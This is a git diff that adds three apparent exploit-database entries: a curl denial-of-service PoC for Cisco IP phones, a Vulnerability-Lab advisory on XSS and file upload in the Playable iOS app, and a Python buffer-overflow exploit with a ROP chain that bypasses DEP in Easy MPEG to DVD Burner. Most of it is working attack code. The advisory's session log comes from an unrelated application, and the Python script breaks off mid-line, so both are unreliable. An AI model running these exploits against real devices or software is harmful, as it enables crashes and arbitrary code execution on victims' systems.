diff --git a/exploits/hardware/webapps/48342.txt b/exploits/hardware/webapps/48342.txt new file mode 100644 index 000000000..b143e957d --- /dev/null +++ b/exploits/hardware/webapps/48342.txt @@ -0,0 +1,13 @@ +# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC) +# Date: 2020-04-15 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://www.cisco.com +# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html +# Version: Before 11.7(1) +# Tested on: Cisco Wireless IP Phone 8821 +# CVE: CVE-2020-3161 +# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs +# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24 + +curl -v --path-as-is --insecure +https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \ No newline at end of file diff --git a/exploits/ios/webapps/48340.txt b/exploits/ios/webapps/48340.txt new file mode 100644 index 000000000..2960d2761 --- /dev/null +++ b/exploits/ios/webapps/48340.txt @@ -0,0 +1,423 @@ +# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +# CVE: N/A + +Document Title: +=============== +Playable v9.18 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2198 + + +Release Date: +============= +2020-04-16 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2198 + + +Common Vulnerability Scoring System: +==================================== +7.3 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod +Touch without conversion - +just copy files to your device through iTunes or over Wifi! To search +for closed captions / +subtitles select a video then press the magnifying glass icon to the top +right of the video. + +(Copy of the Homepage: +https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +vulnerabilities in the official Playable v9.18 apple ios mobile application. + + +Affected Product(s): +==================== +Portable Ltd +Product: Playable v9.18 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-16: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 +A persistent script code injection web vulnerability has been discovered +in the official Playable v9.18 apple ios mobile application. +The vulnerability allows remote attackers to inject own malicious +persistent script codes to the application-side for manipulation. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform uploads +with malicious script code to manipulation the mobile application ui. +The request method to inject is POST and the attack vector of +the vulnerability is persistent. Attackers are able to inject html and +javascript codes to comrpomise the mobile wifi web-application. +The injection point is the upload form on localhost:8881 and the +execution occurs on localhost:80 with the visible ui listing. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected mobile +application modules. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the +official Playable v9.18 apple ios mobile application. +The arbitary file upload vulnerability allows remote attackers to upload +malicious files to compromise the mobile application. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform +uploads with malicious file extions to bypass the parse function. In a +second step the attacker requests the local file to +execute the malicious content on the local web-server. The request +method to inject is POST and the attack vector of the +vulnerability is located on the application-side. The injection point is +the upload form on localhost:8881. The execution +point becomes visible by a request the localhost:80/vid/[filename] path +with the uploaded file content. The is present +because of a missing file parse and insecure upload handling on file +extensions. As well the local web-server can be +reconfigured to provide more security on user interactions. + +Successful exploitation of the arbitrary file upload vulnerability +results in a compromise of the local ios mobile application. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + +Affected Module(s): +[+] /vid/ + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code injection vulnerability can be exploited by +remote attackers with wifi network access without user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Install the ios application +(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034) +2. Start the ios application on your local ios device +3. Start the wifi share service in the application ui +4. Open the web-browser +5. Tamper the http requests +6. Prepare to upload any file and press the upload button +7. Inject as filename any html/js script code payload +8. Continue to transmit the POST method request +9. The file executes on the index listing on port 8881 +(http://localhost:8881/index.html) +10. Successful reproduce of the persistent script code injection web +vulnerability! + + +PoC: Exploitation +>" + + + +PoC: Payload +" + + +--- PoC Session Logs [POST] --- +http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612 +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 9664 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI +Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[], +"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false, +"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":true, +"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[], +"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true, +"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses": +false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true, +"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef", +"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}, +{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[], +"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl +":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories" +:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[], +"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href": +"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6", +"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"", +"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"}, +"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No +outcome processing. +Erase the existing rules, if +any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}} +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Security-Policy: frame-ancestors 'self' +Content-Length: 14 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/json; charset=UTF-8 +- +http://localhost:89/tao/Main/evil.source +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 169 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Security Risk: +============== +1.1 +The security risk of the html inject web vulnerability in the +web-application is estimated as medium. + +1.2 +The security risk of the persistent cross site scripting web +vulnerability in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48339.py b/exploits/windows/local/48339.py new file mode 100755 index 000000000..355fbea67 --- /dev/null +++ b/exploits/windows/local/48339.py @@ -0,0 +1,150 @@ +# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP) +# Date: 2020-04-15 +# Exploit Author: Bailey Belisario +# Tested On: Windows 7 Ultimate x64 +# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe +# Version: 1.7.11 +# Exploit Length: 1015 Bytes +# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode) + +# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow +# Exploit used with Python2.7 +#------------------------------------------------------------------------------------------------------------------------------------# +# Bad Characters: \x00\x0a\x0d # +# SEH Offset: 1012 # +# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe # +#------------------------------------------------------------------------------------------------------------------------------------# + +# Register setup for VirtualProtect() (Bypass DEP) : +#--------------------------------------------------- +# EAX = Points to PUSHAD at time VirtualProtect() is called +# ECX = lpflOldProtect (0x10047d30 as writable location) +# EDX = flNewProtect(0x40) +# EBX = dwSize (0x92) +# ESP = lpAddress (automatic) +# EBP = ReturnTo (ptr to jmp esp) +# ESI = ptr to VirtualProtect() +# EDI = ROP NOP (RETN) + +import struct + +def create_rop_chain(): + + rop_gadgets = [ + + # Put 1 in EDX and decrement to 0 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN + 0x11111111, # Filler + + # Pop the pointer of VirtualProtect into EAX + 0x10037b12, # POP EAX # RETN + 0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll] + + # Dereference Pointer into EDX then move back to EAX + 0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C + 0x10031772, # MOV EAX,EDX # RETN + 0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Push VP and pop into EBP + 0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C + 0x10037b12, # POP EAX # RETN + 0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Use this to get to address needed to Pop VP into ESI + 0x1003619e, # POP EAX # POP ESI # RETN + + # Move VP to +12 on stack then push the POP POP RETN + 0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN + 0x11111111, # Filler popped + 0x11111111, # Filler popped + + # Set ESI to VP + 0x1002e1ce, # POP ESI # RETN [SkinMagic.dll] + 0x11111111, # Where VP is MOV into + + # Set EBP with POP EBP RETN + 0x1002894f, # POP EBP # RETN [SkinMagic.dll] + 0x1002894f, # skip 4 bytes [SkinMagic.dll] + + # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F) + # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x10037b12, # POP EAX # RETN + 0x1005a0a0, # Address of 3F + 0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN + + # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers + # Note: This should be at least length of shellcode + 0x100362c6, # XOR EAX,EAX # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN + + # Set ECX to writable location + 0x1003603f, # POP ECX # RETN [SkinMagic.dll] + 0x10047d30, # &Writable location [SkinMagic.dll] + + # Set EDI to ROP NOP + 0x100395c2, # POP EDI # RETN [SkinMagic.dll] + 0x10032982, # RETN (ROP NOP) [SkinMagic.dll] + + # Do PUSHAD and be 1337 + 0x10037654, # POP EAX # RETN + 0xa140acd2, # CONSTANT + 0x100317c8, # ADD EAX,5EFFC883 # RETN + 0x1003248d, # PUSH EAX # RETN + + # Used to jump to ESP + 0x1001cc57, # ptr to 'push esp # ret ' [SkinMagic.dll] + ] + return ''.join(struct.pack('